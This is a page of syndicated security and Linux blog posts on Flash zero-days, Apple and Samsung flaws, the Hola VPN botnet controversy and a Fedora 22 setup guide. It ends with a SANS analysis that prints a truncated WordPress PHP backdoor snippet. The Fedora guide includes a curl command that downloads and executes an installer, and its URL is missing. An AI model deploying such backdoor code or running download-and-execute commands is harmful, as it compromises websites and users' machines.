Posts tagged ‘chrome’

Krebs on Security: Emergency Patch for Adobe Flash Zero-Day

This post was syndicated from: Krebs on Security and was written by: Brian Krebs. Original post at Krebs on Security.

Adobe Systems Inc. today released an emergency update to fix a dangerous security hole in its widely-installed Flash Player browser plugin. The company warned that the vulnerability is already being exploited in targeted attacks, and urged users to update the program as quickly as possible.

In an advisory issued Tuesday morning, Adobe said the latest version of Flash for Windows and Mac OS X fixes a critical flaw (CVE-2015-3113) that is being actively exploited in “limited, targeted attacks.” The company said systems running Internet Explorer on Windows 7 and below, as well as Firefox on Windows XP, are known targets of these exploits.

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as with Internet Explorer on Windows 8.x, should update to the latest version automatically. To force the installation of an available update in Chrome, click the triple-bar icon to the right of the address bar, select “About Google Chrome,” click the apply-update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera).

In lieu of patching Flash Player yet again, it might be worth considering whether you really need to keep Flash Player installed at all. In a happy coincidence, earlier today I published a piece about my experience going a month without having Flash Player installed. The result? I hardly missed it at all.

Krebs on Security: A Month Without Adobe Flash Player

This post was syndicated from: Krebs on Security and was written by: Brian Krebs. Original post at Krebs on Security.

I’ve spent the better part of the last month running a little experiment to see how much I would miss Adobe‘s buggy and insecure Flash Player software if I removed it from my systems altogether. Turns out, not so much.

Browser plugins are favorite targets for malware and miscreants because they are generally full of unpatched or undocumented security holes that cybercrooks can use to seize complete control over vulnerable systems. The Flash Player plugin is a stellar example of this: It is among the most widely used browser plugins, and it requires monthly patching (if not more frequently).

It’s also not uncommon for Adobe to release emergency fixes for the software to patch flaws that bad guys started exploiting before Adobe even knew about the bugs. This happened most recently in February 2015, and twice the month prior. Adobe also shipped out-of-band Flash fixes in December and November 2014.

Time was, Oracle’s Java plugin was the favorite target of exploit kits, software tools designed to be stitched into hacked or malicious sites and to foist a kitchen sink of plugin exploits on visiting browsers. Lately, however, it seems the pendulum has swung back in favor of exploits for Flash Player. A popular exploit kit known as Angler, for example, bundled a new exploit for a Flash vulnerability just three days after Adobe fixed it in April 2015.

So, rather than continue the patch madness and keep this insecure software installed, I decided to pull the…er…plugin. I tend to (ab)use different browsers for different tasks, and so removing the plugin was mostly a matter of uninstalling Flash, except in Chrome, which bundles its own version of Flash Player. Fear not: disabling Flash in Chrome is simple enough. On a Windows, Mac, Linux or Chrome OS installation of Chrome, type “chrome://plugins” into the address bar, and on the Plug-ins page look for the “Flash” listing. To disable Flash, click the disable link (to re-enable it, click “enable”).

In almost 30 days, I ran into just two instances where I encountered a site hosting a video that I absolutely needed to watch and that required Flash (an instructional video for a home gym that I could find nowhere else, and a live-streamed legislative hearing). For these, I opted to cheat and load the content into a Flash-enabled browser inside of a Linux virtual machine I have running in VirtualBox. In hindsight, it probably would have been easier simply to re-enable Flash in Chrome temporarily, and then disable it again until the need arose.

If you decide that removing Flash altogether or disabling it until needed is impractical, there are in-between solutions. Script-blocking applications like NoScript and ScriptSafe are useful in blocking Flash content, but script blockers can be challenging for many users to handle.

Another approach is click-to-play, which is a feature available for most browsers (except IE, sadly) that blocks Flash content from loading by default, replacing the content on Web sites with a blank box. With click-to-play, users who wish to view the blocked content need only click the boxes to enable Flash content inside of them (click-to-play also blocks Java applets from loading by default).

Windows users who decide to keep Flash installed and/or enabled also should take full advantage of the Enhanced Mitigation Experience Toolkit (EMET), a free tool from Microsoft that can help Windows users beef up the security of third-party applications.

Krebs on Security: Critical Flaws in Apple, Samsung Devices

This post was syndicated from: Krebs on Security and was written by: Brian Krebs. Original post at Krebs on Security.

Normally, I don’t cover vulnerabilities that users can do little or nothing to prevent, but two newly detailed flaws affecting hundreds of millions of Apple and Android devices probably deserve a special exception.

The first is a zero-day bug in iOS and OS X that allows the theft of both Keychain (Apple’s password management system) and app passwords. The flaw, first revealed in an academic paper (PDF) released by researchers from Indiana University, Peking University and the Georgia Institute of Technology, involves a vulnerability in Apple’s latest operating system versions that enables an app approved for the App Store to gain unauthorized access to other apps’ sensitive data.

“More specifically, we found that the inter-app interaction services, including the keychain…can be exploited…to steal such confidential information as the passwords for iCloud, email and bank, and the secret token of Evernote,” the researchers wrote.

The team said they tested their findings by circumventing the App Store’s restrictive security checks, and that their attack apps were approved by the App Store in January 2015. According to the researchers, more than 88 percent of apps were “completely exposed” to the attack.

News of the research was first reported by The Register, which noted that Apple was notified in October 2014 and that in February 2015 the company asked the researchers to hold off on disclosure for six months.

“The team was able to raid banking credentials from Google Chrome on the latest Mac OS X 10.10.3, using a sandboxed app to steal the system’s keychain and secret iCloud tokens, and passwords from password vaults,” The Register wrote. “Google’s Chromium security team was more responsive and removed Keychain integration for Chrome noting that it could likely not be solved at the application level. AgileBits, owner of popular software 1Password, said it could not find a way to ward off the attacks or make the malware ‘work harder’ some four months after disclosure.”

A story at 9to5Mac suggests the malware the researchers created to run their experiments can’t directly access existing keychain entries, but instead does so indirectly by forcing users to log in manually and then capturing those credentials in a newly-created entry.

“For now, the best advice would appear to be cautious in downloading apps from unknown developers – even from the iOS and Mac App Stores – and to be alert to any occasion where you are asked to login manually when that login is usually done by Keychain,” 9to5’s Ben Lovejoy writes.


Separately, researchers at mobile security firm NowSecure disclosed they’d found a serious vulnerability in a third-party keyboard app that is pre-installed on more than 600 million Samsung mobile devices — including the recently released Galaxy S6 — that allows attackers to remotely access resources like GPS, camera and microphone, secretly install malicious apps, eavesdrop on incoming/outgoing messages or voice calls, and access pictures and text messages on vulnerable devices.

The vulnerability in this case resides in the SwiftKey keyboard app, which according to researcher Ryan Welton runs from a privileged account on Samsung devices. The flaw can be exploited if the attacker can control or compromise the network to which the device is connected, such as a wireless hotspot or local network.

“This means that the keyboard was signed with Samsung’s private signing key and runs in one of the most privileged contexts on the device, system user, which is a notch short of being root,” Welton wrote in a blog post about the flaw, which was first disclosed at Black Hat London on Tuesday, alongside the release of proof-of-concept code.

Welton said NowSecure alerted Samsung in November 2014, and that at the end of March Samsung reported it had released a patch to mobile carriers for Android 4.2 and newer, but requested an additional three months’ deferral before public disclosure. Google’s Android security team was alerted in December 2014.

“While Samsung began providing a patch to mobile network operators in early 2015, it is unknown if the carriers have provided the patch to the devices on their network,” Welton said. “In addition, it is difficult to determine how many mobile device users remain vulnerable, given the device models and the number of network operators globally.” NowSecure has released a list of Samsung devices indexed by carrier and their individual patch status.

Samsung issued a statement saying it takes emerging security threats very seriously.

“Samsung KNOX has the capability to update the security policy of the phones, over-the-air, to invalidate any potential vulnerabilities caused by this issue. The security policy updates will begin rolling out in a few days,” the company said. “In addition to the security policy update, we are also working with SwiftKey to address potential risks going forward.”

A spokesperson for Google said the company took steps to mitigate the issue with the release of Android 5.0 in November 2014.

“Although these are most accurately characterized as application level issues, back with Android 5.0, we took proactive measures to reduce the risk of the issues being exploited,” Google said in a statement emailed to KrebsOnSecurity. “For the longer term, we are also in the process of reaching out to developers to ensure they follow best practices for secure application development.”

SwiftKey released a statement emphasizing that the company only became aware of the problem this week, and that it does not affect its keyboard applications available on Google Play or Apple App Store. “We are doing everything we can to support our long-time partner Samsung in their efforts to resolve this important security issue,” SwiftKey said in a blog post.

The Hacker Factor Blog: Late Night Programming

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’ve been spending my evenings working on various tweaks and possible enhancements to the FotoForensics site. Some of these experiments have worked out really well, some have a few problems, and some are still in the “learning curve” phase.


One of my fun projects is related to the trend detector. I am using vis.js to display relationships that represent various types of trends. This results in very cool association graphs!

This snapshot shows related clusters that formed after three days. The actual graph is interactive. I can click on any node to identify more information about it. I like the way it displays and it really helps identify various clusters of related data. However, this tool really isn’t practical for a public release because of two big problems.

The first problem is speed. If there are only a few nodes, then it renders very quickly. A few hundred makes it pause before displaying as it initially stabilizes the graph. But a few thousand? Start it up and go to lunch… it should be done when you get back. While vis.js does a great job at visualizing the data, this JavaScript library really isn’t fast enough for my data set. Ideally, I want to generate this kind of association graph with 10,000 nodes or more, but the browser really can’t handle it. (Vis.js has an option to group clusters until you zoom in, but that loses the global visual representation.)

The second problem is specifically a browser issue. The vis.js library uses a canvas element for rendering. On my old Chrome 21.x browser, it renders great! Fast and easy to use. However, the default Chromium for Ubuntu 14.04 (Chromium 5) won’t render anything — you just see a black background and it complains about a JavaScript error in vis.js (but there is no error). Chrome 43 for Windows and Firefox 37 for Ubuntu both have memory leaks related to the canvas tag. They will render the first graph without a problem. If you reload the page and open another graph, then it becomes slow. A third reload makes it horribly slow. And by the 4th or 5th reload, the browser hangs. Even closing the tab (but not the browser) between reloads is not enough to resolve this issue.

I’m not the only person to notice this memory leak. It seems to impact newer versions of Firefox, Chrome, and Chromium, dating back more than a year. (Examples: #1, #2, #3.) I suspect that Safari and other WebKit browsers may have the same problem.

And before someone asks… Yes, I tried the latest-greatest versions of Chrome and Firefox. Both crash on Ubuntu 14.04 before they can load any pages. (These are unstable browser ports.) On Windows, they still have the memory leak. For right now, I’m only using this vis.js code on an old Chrome browser that predates the memory leak. Ideally I’d like an interactive web-based solution that can handle 10,000 nodes, but that doesn’t seem likely in the near future.


I’ve been spending some time trying to wrap my head around WebRTC. That’s the interactive web technology that permits video and audio sharing. My long-term goal is to configure a WebRTC server for FotoForensics, where I can share my browser window and conduct online training sessions for specific clients, research partners, and occasional guests. (This isn’t intended for the public FotoForensics server. It’s more for the private servers, which have more features and really require training sessions.)

I’ve finally wrapped my head around the WebRTC, STUN, and TURN relationships that are required for enabling this technology. There are dozens of web pages with overviews and tutorials, but none of them are very good or detailed. And I still need to figure out how to do things like encryption. (Some docs say that the traffic is automagically encrypted, but I cannot find details about how this works.)
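For anyone else trying to piece this together: the STUN/TURN half is usually handled by a standalone server such as coturn, and a minimal turnserver.conf sketch looks something like the following. The realm, user credentials, and certificate paths here are placeholders for illustration, not a working or recommended setup.

```
# coturn turnserver.conf sketch: one daemon serving both STUN and TURN.
# Realm, user, and certificate paths are placeholders, not a real setup.
listening-port=3478
tls-listening-port=5349
fingerprint
lt-cred-mech
realm=example.com
user=demo:changeme
cert=/etc/ssl/turn_cert.pem
pkey=/etc/ssl/turn_key.pem
```

The browser side then just lists this server under iceServers when creating a peer connection. As for the "automagic" encryption: WebRTC mandates DTLS-SRTP for media streams, so even a TURN relay only ever sees encrypted traffic.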

Installing, configuring, and deploying is another complex issue. While there are a few ready-to-go installation packages, I haven’t found them easy to customize. For example, I have my own login management system but I cannot figure out how to integrate it. I want to make sure users cannot create their own private chat rooms, but most code enables arbitrary room allocations. And I want to share either an app (browser) or a desktop and not a video camera, but I cannot figure out how to do that. In some cases, I may just want to share audio without video, or audio with a text-chat window. In other cases, I want users to be able to share their desktops with me so that I can help diagnose content. But I haven’t figured out how to do any of these either.

I have also played with external systems, like Google Hangouts, GoToMeeting, and WebEx. I like the speed, I like the flow, and I like the features like a text-based chat window and Hangout’s live annotations. But I don’t like the idea of sending anything related to my technologies through a third party; all communications should go direct from my server and my desktop computer to the other member’s computers. I want no dependencies on any external third-party services. Also, anything that requires installing special software as a plugin or an app is a show-stopper. I need to support a lot of different platforms, and requiring every user to install a plugin or app is not a platform independent solution.


Outside of the graphical arena, I’ve been looking more at the various users who attack my site or violate the terms of service. If I can identify trends, then I can address them and cut down on abuses.

Recently I noticed that some of these abusers are using cloud service providers. So, I decided to map out which services they use. I really expected them to be evenly distributed across the various cloud solutions, but that is definitely not the case.

Some of the biggest cloud providers, like CloudFlare, Rackspace, Softlayer, and Microsoft’s Azure, do not show up at all in my lists of abusive sources. I assume this means they are very good at policing their users. (Either that, or these services are too expensive for the riff-raff.) The cloud services offered by Google and Amazon do not have many violators, but nearly all of their violators are associated with hostile network attacks. These are systems that are explicitly trying to compromise other online computers. And in the case of Google, a few hostile accounts have been going at it for at least a few months. Either these cloud services have not noticed that their users are hostile, or they do not care about stopping outbound attacks.

In contrast to Google and Amazon, Versaweb, GTT/nLayer, and a few others are mostly associated with proxies that are used to violate my terms of service (i.e., porn uploaders). This makes their traffic really easy to identify, and I can flag their content as potential violations. I should have a new autoban rule implemented in the near future.
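As a rough sketch of the kind of autoban rule described above, here is how flagging by source network might look from the command line. The network ranges (TEST-NET blocks) and the common-log format are hypothetical examples, not FotoForensics' actual data or rules:

```shell
# Sketch: collect unique client IPs that POSTed (uploaded) from network
# ranges associated with abusive proxies. Ranges below are made-up examples.
flagged='^203[.]0[.]113[.]|^198[.]51[.]100[.]'
awk -v pat="$flagged" '$1 ~ pat && $6 ~ /POST/ {print $1}' access.log \
  | sort -u > flagged-uploaders.txt
```

The resulting list could then feed a firewall rule or an application-level review queue.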

More Changes

I’m still trying to finish up and deploy a few other technologies. Some of these will better protect my site, while others will make the site more convenient for users and analysts. Whenever I deploy an improvement to the site, I end up learning something new, and that may lead to additional fun research topics. I am definitely looking forward to these behind-the-scenes updates and whatever surprises they may bring.

Krebs on Security: Adobe, Microsoft Issue Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: Brian Krebs. Original post at Krebs on Security.

Adobe today released software updates to plug at least 13 security holes in its Flash Player software. Separately, Microsoft pushed out fixes for at least three dozen flaws in Windows and associated software.

The bulk of the flaws Microsoft addressed today (23 of them) reside in the Internet Explorer Web browser. Microsoft also issued fixes for serious problems in Office, the Windows OS itself and Windows Media Player, among other components. A link to an index of the individual Microsoft updates released today is here.

As it normally does on Patch Tuesday, Adobe issued fixes for its Flash and AIR software, plugging a slew of dangerous flaws in both products. Flash continues to be one of the more complex programs to manage and update on a computer, mainly because its auto-update function tends to lag the actual patches by several days at least (your mileage may vary), and it’s difficult to know which version is the latest.

If you’re unsure whether your browser has Flash installed or what version it may be running, browse to this link. Users of the Adobe Flash Player Desktop Runtime for Windows and Macintosh should update to the latest version. Adobe Flash Player installed with Google Chrome, as well as with Internet Explorer on Windows 8.x, should update automatically, although Adobe notes that Chrome users on Mac systems will see a different version number for the latest build. To force the installation of an available update, click the triple-bar icon to the right of the address bar, select “About Google Chrome,” click the apply-update button and restart the browser.


The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox or Opera). See this graphic for the full Adobe version release information.

Most applications bundled with Adobe AIR should check for updates on startup. If prompted, please download and install the AIR update. If you need to update manually, grab the latest version here.

As usual, please sound off in the comments section if you experience any issues applying any of these patches.

TorrentFreak: Hola VPN Already Exploited By “Bad Guys”, Security Firm Says

This post was syndicated from: TorrentFreak and was written by: Andy. Original post at TorrentFreak.

After a flurry of reports, last week the people behind geo-unblocking software Hola were forced to concede that their users’ bandwidth is being sold elsewhere for commercial purposes. But for the Israel-based company, that was the tip of the iceberg.

Following an initial, unproven report that the software operates as a botnet, this weekend researchers published an advisory confirming serious problems with the tool.

“The Hola Unblocker Windows client, Firefox addon, Chrome extension and Android application contain multiple vulnerabilities which allow a remote or local attacker to gain code execution and potentially escalate privileges on a user’s system,” the advisory reads.

Yesterday, after several days of intense pressure, Hola published a response in which it quoted Steve Jobs and admitted that mistakes had been made. Hola said that it would now be making it “completely clear” to its users that their resources are being used elsewhere in exchange for a free product.

Hola also confirmed that two vulnerabilities found by the researchers at Adios-Hola had now been fixed, but the researchers quickly fired back.

“We know this to be false,” they wrote in an update. “The vulnerabilities are *still* there, they just broke our vulnerability checker and exploit demonstration. Not only that; there weren’t two vulnerabilities, there were six.”

With Hola saying it now intends to put things right (it says it has committed to an external audit with “one of the big 4 auditing companies”), the company stood by its claim that its software does not turn users’ computers into a botnet. Today, however, an analysis by cybersecurity firm Vectra paints Hola in an even more unfavorable light.

In its report, Vectra not only insists that Hola behaves like a botnet, but suggests it may have malicious features by design.

“While analyzing Hola, Vectra Threat Labs researchers found that in addition to behaving like a botnet, Hola contains a variety of capabilities that almost appear to be designed to enable a targeted, human-driven cyber attack on the network in which an Hola user’s machine resides,” the company writes.

“First, the Hola software can download and install any additional software without the user’s knowledge. This is because in addition to being signed with a valid code-signing certificate, once Hola has been installed, the software installs its own code-signing certificate on the user’s system.”

If the implications of that aren’t entirely clear, Vectra assists on that front too. On Windows machines, the certificate is added to the Trusted Publishers Certificate Store which allows *any code* to be installed and run with no notification given to the user. That is frightening.

Furthermore, Vectra found that Hola contains a built-in console (“zconsole”) that is not only constantly active but also has powerful functions including the ability to kill running processes, download a file and run it whilst bypassing anti-virus software, plus read and write content to any IP address or device.

“These capabilities enable a competent attacker to accomplish almost anything. This shifts the discussion away from a leaky and unscrupulous anonymity network, and instead forces us to acknowledge the possibility that an attacker could easily use Hola as a platform to launch a targeted attack within any network containing the Hola software,” Vectra says.

Finally, Vectra says that while analyzing the protocol used by Hola, its researchers found five different malware samples on VirusTotal that contain the Hola protocol. Worryingly, they existed before the recent bad press.

“Unsurprisingly, this means that bad guys had realized the potential of Hola before the recent flurry of public reports by the good guys,” the company adds.

For now, Hola is making a big show of the updates being made to its FAQ as part of its efforts to be more transparent. However, items in the FAQ are still phrased in a manner that portrays criticized elements of the service as positive features, something that is likely to mislead non-tech oriented users.

“Since [Hola] uses real peers to route your traffic and not proxy servers, it makes you more anonymous and more secure than regular VPN services,” one item reads.

How Hola will respond to Vectra’s latest analysis remains to be seen, but at this point there appears to be little the company can say or do to pacify much of the hardcore tech community. That being said, if Joe Public still can’t see the harm in a free “community” VPN operating a commercial division with full access to his computer, Hola might settle for that.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

Linux How-Tos and Linux Tutorials: 11 Things to do After Installing Fedora 22

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post at Linux How-Tos and Linux Tutorials.

Fedora 22 is certainly an exciting release for hardcore Fedora fans, and it has more than enough glitter to attract potential new users.

One of the most notable improvements includes the arrival of DNF which replaces the aging Yum. In my own experience DNF is faster and more memory efficient than Yum. It looks like we have an answer to apt-get in Fedora land.

Since Fedora is primarily a Gnome distro, you will notice the brand new and shiny Gnome 3.16. There are massive improvements in Gnome 3.16 including the brand new notification system, the improved Nautilus (Files) and image viewer which removes all the chrome to focus on the image itself.

One of the most exciting tools in Fedora is the newly introduced Vagrant, which helps developers get started with virtualized environments quickly and easily.

As usual it’s a polished release of the distro, with a lot of new features that we will cover in a detailed review next week.

Every operating system, whether it be Mac OS X, Windows or Fedora, needs some work to customize it for its user. However, unlike its proprietary counterparts, Fedora comes with quite a lot of software pre-installed, so you won’t have to do that much work.

Here are some of the things that I do after installing Fedora on a system. None of it is mandatory and most of it is targeted to an average user. You will be able to use Fedora without doing any of it, but these tips can help improve your experience with the distro. So without further ado let’s get started.

Update your system

First of all we need to update the system. A lot of packages will have received updates between the time the release media were built and the time you installed Fedora on your system. To keep your system safe and secure you must keep it up-to-date. With Fedora 22, ‘yum’ is on its way out and ‘dnf’ is replacing it, so we will be using ‘dnf’ instead of ‘yum’ for many of these tasks.

To install updates on your system run the following command:

sudo dnf update

Install extra repositories

As is widely known, many Linux distributions can’t ship a variety of packages through official repositories due to license and patent concerns. On a Fedora system you can get access to such packages by installing the RPM Fusion repositories.

You have to install two repositories – Free and Non-free. It’s extremely simple to add these repositories to your system; just open the RPM Fusion website. There you will find links for different versions of Fedora. Click on the link for your version of Fedora and it will install that repo on your system through the ‘Software’ app. It’s recommended to first install the ‘Free’ repo and then the ‘Non-Free’ one.
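If you prefer the command line, the same two repos can be added with ‘dnf’ directly, using the release RPMs published on the RPM Fusion site (the URLs below follow RPM Fusion’s documented pattern; adjust if the project changes them):

```shell
# Add the Free and Nonfree RPM Fusion repos for the installed Fedora release.
# "rpm -E %fedora" expands to the release number (22 at the time of writing).
ver=$(rpm -E %fedora)
sudo dnf install \
  "https://mirrors.rpmfusion.org/free/fedora/rpmfusion-free-release-${ver}.noarch.rpm" \
  "https://mirrors.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-${ver}.noarch.rpm"
```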


Once these two repos are installed we now have access to many more applications.

Install VLC Media Player

VLC is the Swiss Army knife of media players. It can play virtually every media format out there. Since the RPM Fusion repos are already installed, you can install VLC using ‘dnf’:

sudo dnf install vlc

Install Clementine

As much as I like Gnome, the default desktop environment of Fedora, I am not a huge fan of the painfully simple Rhythmbox. I always install the ‘Clementine’ music player which not only has a nicer interface, but also comes with more features. You can install Clementine by running:

sudo dnf install clementine

Install MP3 codecs

Fedora’s focus on FOSS-only software packages does make it more challenging to get stuff like mp3 files to work. I used to install gstreamer plugins for mp3 support, but I faced some problems in Fedora 22. So I resorted to another nifty tool called Fedy. Since Fedy does more than installing codecs, I will talk about it separately.

Get Fedy, before you get fed-up

Fedy is a ‘jack of all trades’ kind of tool. Install Fedy using the following command:

$ su -c "curl -o fedy-installer && chmod +x fedy-installer && ./fedy-installer"

Once installed, you will see there are broadly two kinds of tasks you can perform using Fedy: installing new packages and tweaking the system. Under the ‘Apps’ tab you will find the option to install ‘multimedia codecs’, which will also bring mp3 support to your system.

Just scroll through it and see what else you want to install. Two of my favorite packages, in addition to codecs, are Microsoft fonts (for better font rendering) and Sublime Text.


Chances are that some fonts will look ugly in Fedora. This problem isn’t unique to Fedora; I have the same issue with Arch Linux, openSUSE and Kubuntu as well. I used to spend a considerable amount of time fixing fonts on these systems. Fedy has made it extremely easy to make fonts look good under Fedora with just one click. Under ‘Tweaks’ one of the most important options is ‘font rendering’, which will fix font issues on your system.

Install Gnome Tweak Tool

Gnome is the default desktop environment of Fedora, and the overall Gnome experience relies heavily on extensions. Gnome Tweak Tool is an important tool to get a pristine Gnome experience, so it’s surprising that it doesn’t come pre-installed on Fedora. By comparison, openSUSE does a better job by pre-installing Tweak Tool and some useful extensions. You can install Tweak Tool in Fedora by running this command:

sudo dnf install gnome-tweak-tool

Once the tool is installed, you can manage your extensions from there. I wish the tool was able to search and install new extensions too. Currently you have to visit the Gnome Extensions site to install new extensions. Once the extension is installed, you can enable it, configure it and disable it from the Tweak Tool.

Since I have a multi-monitor set-up, I grab the Multiple Monitors extension. I also recommend ‘Dash to Dock’, which lets you configure the Dash: you can stop it from auto-hiding, change the icon size, and even choose where on the screen it sits. Last, but not least, you can extend the dash to the full length of the screen, just like the launcher in Unity. For users of multiple monitors, there is a nifty option to show the dash on the desired monitor. It’s a must-have extension.

Install Chrome to watch Netflix

Fedora tends to offer the vanilla Gnome experience, but instead of Web, Gnome’s default browser, it ships with Firefox. However, Firefox still doesn’t support DRM-protected content on Linux, so you can’t watch Netflix. That’s where Google Chrome comes in handy. You can install Chrome either by downloading it from the Google site or through Fedy.

Download and install Chrome from the official site.
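If you go the download route, the usual sequence looks like this (a sketch: the RPM URL and filename follow Google’s current naming and may change):

```shell
# Download Google's RPM package and install it with dnf so that any missing
# dependencies are resolved automatically. The filename is Google's current
# naming convention and may change.
cd ~/Downloads
curl -LO https://dl.google.com/linux/direct/google-chrome-stable_current_x86_64.rpm
sudo dnf install ./google-chrome-stable_current_x86_64.rpm
```

Installing the package this way should also set up Google’s own repository, so Chrome gets updated along with the rest of the system.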

Cloud in your hands

If you are running your own private cloud — and you must in order to safeguard any sensitive data — you can grab the clients for Seafile or ownCloud for your system. But if you use Google Drive or Dropbox you can also use them easily on Fedora.

There are official clients for all commercial cloud services including Dropbox, with Google Drive being an exception. One of the easiest ways to get Google Drive on Linux is inSync; while it does have more features than the Google Drive client, it costs money to use. You can install inSync by downloading the official client from their website. Once installed, connect it to your Google account, point it to the location where you want your files to be saved, and you are good to take Google for a drive.

Online accounts

Despite being a Plasma user I envy the Online Accounts feature of Gnome. It makes it extremely easy to configure communication tools such as email, calendars, address book and IM.

Gnome’s Online Accounts supports more than half a dozen services, including Google, Facebook, Flickr and ownCloud. Open Online Accounts from the Dash and choose the service you want to configure. Once you are connected to an account, you can choose which services to enable for it. In the case of Google, for example, I enabled all of them.

fedora online accounts

The beauty is that when I open Evolution, the default email client in Fedora, it’s already configured with that email account.

Getting non-free drivers for GPU

It’s really hard to get non-free software to work with Fedora. I use Arch Linux, and I find it much easier to install Nvidia drivers on Arch than on Fedora. In most cases you will not need non-free drivers under Fedora, as your graphics card will work out of the box. If you do need them (why buy an expensive Nvidia card if you can’t take full advantage of it?), you have some hard work ahead of you. I broke previous Fedora installs with non-free drivers, so I gave up on them. If you want to install such drivers on your Fedora box, I suggest following this RPMFusion page. My free advice: don’t try it at home.
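For the brave, the procedure that RPMFusion page documents boils down to something like the following (a sketch using RPMFusion’s published release-package URLs; package names can change between driver series):

```shell
# Enable the RPMFusion free and nonfree repositories for the installed release.
# "rpm -E %fedora" expands to the Fedora version number (e.g. 22).
sudo dnf install \
  https://download1.rpmfusion.org/free/fedora/rpmfusion-free-release-$(rpm -E %fedora).noarch.rpm \
  https://download1.rpmfusion.org/nonfree/fedora/rpmfusion-nonfree-release-$(rpm -E %fedora).noarch.rpm
# Install the packaged Nvidia driver; the akmod variant rebuilds the kernel
# module automatically after kernel updates.
sudo dnf install akmod-nvidia
```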

Getting your printer to work in Fedora

It’s a non-issue nowadays, depending on the make of your printer. In most cases, when you run the Printers tool, Fedora will detect and configure your printer with one click.

That’s most of what I do on my Fedora system. A few things, mostly related to non-free software, do look more complicated under Fedora. That’s mainly due to Fedora’s policy to use and promote FOSS. Once you cross that river Fedora is a pleasant OS to use.

Now tell us what things you do after installing Fedora on your system.

TorrentFreak: Hola VPN Sells Users’ Bandwidth, Founder Confirms

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

Faced with increasing local website censorship and Internet services that restrict access depending on where a user is based, more and more people are turning to specialist services designed to overcome such limitations.

With prices plummeting to just a few dollars a month in recent years, VPNs are now within the budgets of most people. However, there are always those who prefer to get such services for free, without giving much consideration to how that might be economically viable.

One of the most popular free VPN/geo-unblocking solutions on the planet is operated by Israel-based Hola. It can be added to most popular browsers in seconds and has an impressive seven million users on Chrome alone. Overall the company boasts 46 million users of its service.

Now, however, the company is facing accusations from 8chan message board operator Fredrick Brennan. He claims that Hola users’ computers were used to attack his website without their knowledge, and that this was made possible by the way Hola is set up.

“When a user installs Hola, he becomes a VPN endpoint, and other users of the Hola network may exit through his internet connection and take on his IP. This is what makes it free: Hola does not pay for the bandwidth that its VPN uses at all, and there is no user opt out for this,” Brennan says.

This means that rather than having their IP addresses cloaked behind a private server, free Hola users are regularly exposing their IP addresses to the world but associated with other people’s traffic – no matter what that might contain.


While this will come as a surprise to many, Hola says it has never tried to hide the methods it employs to offer a free service.

Speaking with TorrentFreak, Hola founder Ofer Vilenski says that his company offers two tiers of service – the free option (which sees traffic routed between Hola users) and a premium service, which operates like a traditional VPN.

However, Brennan says that Hola goes a step further, by selling Hola users’ bandwidth to another company.

“Hola has gotten greedy. They recently (late 2014) realized that they basically have a 9 million IP strong botnet on their hands, and they began selling access to this botnet (right now, for HTTP requests only) at,” the 8chan owner says.

TorrentFreak asked Vilenski about Brennan’s claims. Again, there was no denial.

“We have always made it clear that Hola is built for the user and with the user in mind. We’ve explained the technical aspects of it in our FAQ and have always advertised in our FAQ the ability to pay for non-commercial use,” Vilenski says.

And this is how it works.

Hola generates revenue by selling a premium service to customers through its Luminati brand. The resources and bandwidth for the Luminati product are provided by Hola users’ computers when they are sitting idle. In basic terms, Hola users get their service for free as long as they’re prepared to let Hola hand their resources to Luminati for resale. Any users who don’t want this to happen can buy Hola for $5 per month.

Fair enough perhaps – but how does Luminati feature in Brennan’s problems? It appears his interest in the service was piqued after 8chan was hit by multiple denial of service attacks this week which originated from the Luminati / Hola network.

“An attacker used the Luminati network to send thousands of legitimate-looking POST requests to 8chan’s post.php in 30 seconds, representing a 100x spike over peak traffic and crashing PHP-FPM,” Brennan says.

Again, TorrentFreak asked Vilenski for his input. Again, there was no denial.

“8chan was hit with an attack from a hacker with the handle of BUI. This person then wrote about how he used the Luminati commercial VPN network to hack 8chan. He could have used any commercial VPN network, but chose to do so with ours,” Vilenski explains.

“If 8chan was harmed, then a reasonable course of action would be to obtain a court order for information and we can release the contact information of this user so that they can further pursue the damages with him.”

Vilenski says that Hola screens users of its “commercial network” (Luminati) prior to them being allowed to use it but in this case “BUI” slipped through the net. “Adjustments” have been made, Hola’s founder says.

“We have communicated directly with the founder of 8Chan to make sure that once we terminated BUI’s account they’ve had no further problems, and it seems that this is the case,” Vilenski says.

It is likely the majority of Hola’s users have no idea how the company’s business model operates, even though it is made fairly clear in its extensive FAQ/ToS. Installing a browser extension takes seconds and if it works as advertised, most people will be happy.

Whether this episode will affect Hola’s business moving forward is open to question, but for those with a few dollars to spend there are plenty of options in the market. In the meantime, those looking for free options should read the small print before clicking install.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and anonymous VPN services.

SANS Internet Storm Center, InfoCON: green: Possible WordPress Botnet C&C:, (Tue, May 26th)

This post was syndicated from: SANS Internet Storm Center, InfoCON: green and was written by: SANS Internet Storm Center, InfoCON: green. Original post: at SANS Internet Storm Center, InfoCON: green

Thanks to one of our readers for sending us this snippet of PHP he found on a WordPress server (I added some line breaks and comments in red for readability):

#2b8008#
@error_reporting(0);                        /* turn off error reporting */
@ini_set('display_errors', 0);              /* do not display errors to the user */
$wp_mezd8610 = @$_SERVER['HTTP_USER_AGENT'];

/* only run the code if this is Chrome or IE and not a bot */
if (preg_match('/Gecko|MSIE/i', $wp_mezd8610) && !preg_match('/bot/i', $wp_mezd8610))
{

# Assemble a URL like ...?ip=[client ip]&referer=[server host name]&ua=[user agent]

